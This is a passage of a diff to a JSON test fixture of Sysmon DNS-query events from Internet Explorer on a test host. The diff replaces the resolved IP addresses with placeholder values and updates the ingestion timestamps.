"Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -860,12 +855,12 @@ "type": "CNAME" }, { - "data": "20.36.253.92", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.253.92" + "89.160.20.156" ] }, "network": { 
@@ -881,13 +876,13 @@ "c.msn.com" ], "ip": [ - "20.36.253.92" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741057400Z", + "ingested": "2021-12-09T13:50:23.456628300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -955,17 +950,17 @@ "type": "CNAME" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "13.107.21.200", - "204.79.197.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -982,14 +977,13 @@ "c.bing.com" ], "ip": [ - "13.107.21.200", - "204.79.197.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741063100Z", + "ingested": "2021-12-09T13:50:23.456633800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -1049,12 +1043,12 @@ }, "answers": [ { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { 
@@ -1069,13 +1063,13 @@ "contextual.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741070500Z", + "ingested": "2021-12-09T13:50:23.456639800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1151,12 +1145,12 @@ "type": "CNAME" }, { - "data": "152.195.32.120", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "152.195.32.120" + "89.160.20.156" ] }, "network": { 
@@ -1175,13 +1169,13 @@ "at.atwola.com" ], "ip": [ - "152.195.32.120" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741079Z", + "ingested": "2021-12-09T13:50:23.456645400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1249,15 +1243,15 @@ "type": "CNAME" }, { - "data": "204.13.192.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.120", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -1265,7 +1259,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -1273,7 +1267,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -1281,20 +1275,20 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "204.13.192.56",
- "204.13.192.120",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30"
+ "192.168.80.30"
 ]
 },
 "network": {
@@ -1311,21 +1305,20 @@ "m.adnxs.com" ], "ip": [ - "204.13.192.56", - "204.13.192.120", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741087100Z", + "ingested": "2021-12-09T13:50:23.456651Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 
Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", 
@@ -1389,12 +1382,12 @@
 "type": "CNAME"
 },
 {
- "data": "74.6.137.78",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "74.6.137.78"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -1410,13 +1403,13 @@ "cms.analytics.yahoo.com" ], "ip": [ - "74.6.137.78" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741098800Z", + "ingested": "2021-12-09T13:50:23.456656600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1484,12 +1477,12 @@ "type": "CNAME" }, { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { 
@@ -1506,13 +1499,13 @@ "cvision.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741107300Z", + "ingested": "2021-12-09T13:50:23.456662500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData 